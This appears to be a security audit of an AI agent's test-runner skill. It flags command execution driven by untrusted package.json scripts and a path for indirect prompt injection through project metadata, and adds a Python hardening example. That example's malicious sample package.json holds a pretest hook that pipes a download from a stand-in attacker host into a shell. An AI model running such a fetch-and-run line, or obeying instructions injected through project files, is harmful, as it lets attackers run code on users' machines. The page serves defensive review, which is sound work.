testing-patterns
Warn
Audited by Gen Agent Trust Hub on Feb 18, 2026
Risk Level: MEDIUM
COMMAND_EXECUTION
Full Analysis
- COMMAND_EXECUTION (MEDIUM): The file scripts/test_runner.py executes system commands using subprocess.run. It determines the command to run based on the contents of a package.json file in the provided project path. An attacker could craft a malicious project where the 'test' script executes harmful commands, which this script would then trigger without further validation.
- Dynamic Execution (MEDIUM): The test_runner.py script dynamically constructs command lists (e.g., ['npm', 'test'] or ['npx', 'jest', '--coverage']) based on environment detection. This pattern of building and executing commands from external configuration files is a medium-risk dynamic execution vector, as it relies on untrusted metadata to define execution paths.
- Indirect Prompt Injection (LOW): The skill is vulnerable to indirect prompt injection via the project files it processes.
  - Ingestion points: Reads package.json, pyproject.toml, and requirements.txt in scripts/test_runner.py to determine execution logic.
  - Boundary markers: None; the script lacks delimiters or warnings to ignore malicious instructions embedded in project metadata.
  - Capability inventory: subprocess.run in scripts/test_runner.py provides command execution capability via the local environment's test runners.
  - Sanitization: No sanitization of project-defined scripts or command-line arguments extracted from the target project is performed before execution.
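The COMMAND_EXECUTION and Dynamic Execution findings above share one root cause: whatever package.json declares under scripts.test (and the pretest/posttest hooks npm fires around it) is what ['npm', 'test'] ultimately executes, so the project under test decides the command. The block below is an added example written for this page, not code from the testing-patterns skill or its scripts/test_runner.py. It shows the missing pre-execution check: parse package.json, reject scripts that use shell operators or a runner outside an allowlist, and only then call subprocess.run. The function names, the allowlist contents, and the two sample package.json documents are assumptions constructed for the example.

```python
import json
import re
import shlex
import subprocess
from pathlib import Path

# Hypothetical policy: runners permitted as the first word of a test script.
ALLOWED_RUNNERS = {"jest", "vitest", "mocha", "ava", "tap"}
# Characters that let a script chain, redirect, or substitute commands.
# Deliberately strict: "lint && jest" is rejected too; tune to taste.
SHELL_METACHARS = re.compile(r"[;&|<>`$\n]")
# Scripts that `npm test` triggers; the lifecycle hooks fire automatically.
NPM_TEST_LIFECYCLE = ("pretest", "test", "posttest")


def check_script(script: str) -> tuple[bool, str]:
    """Decide whether one package.json script line is acceptable to run."""
    if not script.strip():
        return False, "empty script"
    if SHELL_METACHARS.search(script):
        return False, f"shell operator in script: {script!r}"
    try:
        tokens = shlex.split(script)
    except ValueError as exc:
        return False, f"unparseable script: {exc}"
    runner, args = tokens[0], tokens[1:]
    # `npx X` is allowed only when X itself is an allowlisted runner.
    if runner == "npx":
        if not args or args[0] not in ALLOWED_RUNNERS:
            return False, f"npx target not allowlisted: {args[:1]}"
        return True, "ok"
    if runner not in ALLOWED_RUNNERS:
        return False, f"runner not allowlisted: {runner!r}"
    return True, "ok"


def vet_package_json(text: str) -> tuple[bool, str]:
    """Vet every script `npm test` would run, not only scripts.test."""
    try:
        data = json.loads(text)
    except json.JSONDecodeError as exc:
        return False, f"invalid package.json: {exc}"
    scripts = data.get("scripts") if isinstance(data, dict) else None
    if not isinstance(scripts, dict) or "test" not in scripts:
        return False, "no scripts.test entry"
    for key in NPM_TEST_LIFECYCLE:
        if key not in scripts:
            continue
        ok, reason = check_script(str(scripts[key]))
        if not ok:
            return False, f"{key}: {reason}"
    return True, "ok"


def run_npm_test(project_dir: Path) -> subprocess.CompletedProcess:
    """Hardened counterpart of an unvetted subprocess.run(['npm', 'test'])."""
    ok, reason = vet_package_json((project_dir / "package.json").read_text())
    if not ok:
        raise PermissionError(f"refusing npm test in {project_dir}: {reason}")
    # shell=False removes one interpretation layer, but npm still runs the
    # script through a shell; that is why the vetting has to happen first.
    return subprocess.run(["npm", "test"], cwd=project_dir, shell=False,
                          check=False, timeout=600)


# Constructed sample inputs (not taken from any real project).
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "demo", "scripts": {"test": "jest --coverage --runInBand"}})
MALICIOUS_PACKAGE_JSON = json.dumps({
    "name": "demo",
    "scripts": {"pretest": "curl -s https://attacker.invalid/p | sh",
                "test": "jest"}})

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PACKAGE_JSON),
                       ("malicious", MALICIOUS_PACKAGE_JSON)):
        print(label, vet_package_json(doc))
```

The malicious sample keeps scripts.test clean and hides the payload in pretest, which is why the check walks the whole lifecycle rather than the single key the audit names. The allowlist does not make running untrusted projects safe: a permitted runner still loads the project's own test files and configuration, which execute code, so the check only removes the most direct vector described above.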
Audit Metadata